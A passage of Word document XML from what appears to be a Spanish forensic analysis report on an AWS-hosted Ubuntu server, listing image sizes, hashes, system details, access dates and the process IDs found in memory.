          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>324ed7db769620e3fb55c027480d0ef3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A18129" w14:textId="6AE48AB3" w:rsidR="003E3C01" w:rsidRPr="003E3C01" w:rsidRDefault="003E3C01">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA1: </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>3398f90d2438230aaaf7b5e8ce0a01e456d9ca10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D042C4" w14:textId="6B050888" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La imagen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la memoria 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0231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiene un tamaño de 1.073.336.384 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, por lo que resulta un tamaño aproximado de </w:t>
      </w:r>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1.023,61</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> MB, o de </w:t>
      </w:r>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0,9996</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E470C" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRPr="00327F0A" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La imagen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del Disco Duro</w:t>
      </w:r>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiene un tamaño de </w:t>
      </w:r>
      <w:r w:rsidRPr="00327F0A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1.525.554.298</w:t>
      </w:r>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, por lo que resulta un tamaño aproximado de </w:t>
      </w:r>
      <w:r w:rsidRPr="00327F0A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1.454</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00327F0A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>88</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> MB, o de </w:t>
      </w:r>
      <w:r w:rsidRPr="00327F0A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1,4207</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40187C4A" w14:textId="1545F075" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000231FB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El sistema operativo es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Linux Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de uso.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server 18.4 LTS con un Kernel Linux 4.15.0-1021-aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0664F010" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se identifica como propietario del servidor como a la empresa Ganga.site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695A4CBC" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La fecha de instalación del sistema operativo es el </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>21 de diciembre de 2018 a las 12:04:49 UTC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483EA79B" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54058">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se destaca del dispositivo investigado los siguientes elementos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B0C0F3" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Máquina Virtual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E6E35F" w14:textId="6D56090D" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alojado en servidores AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD9D15" w14:textId="35DDBA34" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CPU (Central Processing Unit): Unidad de procesamiento central de una computadora, el componente principal que realiza la mayoría de las operaciones de procesamiento.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GenuineIntel Intel(R) Xeon(R) CPU E5-2676 v3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.4Ghz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50702C35" w14:textId="1FE90BB9" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tarjeta de red tipo ethernet virtual con MAC</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MAC: Media Access Control, dirección única asignada a la interfaz de red de un dispositivo.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A93567">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>06:4C:CD:F6:51:2C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5CD793" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El ultimo acceso registrado fue el </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 de enero de 2019 a las 08:16:46 UTC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C718F0" w14:textId="3C3C4371" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>En la memoria RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>RAM (Random Access Memory): Tipo de memoria de computadora donde se almacenan datos temporales y programas en uso.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> analizada se detectan las siguientes evidencias:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1496D1" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se ha arrancado 12 veces el proceso de </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>apache2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con los siguientes Pid’s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EA8B6B" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5469, 19704-19708, </w:t>
      </w:r>
      <w:r w:rsidRPr="00941895">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>19952</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-19953, 20230-20233.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F36A41" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se ha arrancado 3 veces el proceso de </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con los siguientes Pid’s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7040060B" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>12159, 20483 20576.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6334CA4E" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se ha arrancado 2 veces el proceso de </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>con los siguientes Pid’s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B420B58" w14:textId="77777777" w:rsidR="00BB78C7" w:rsidRDefault="00BB78C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A6EE4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20485</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
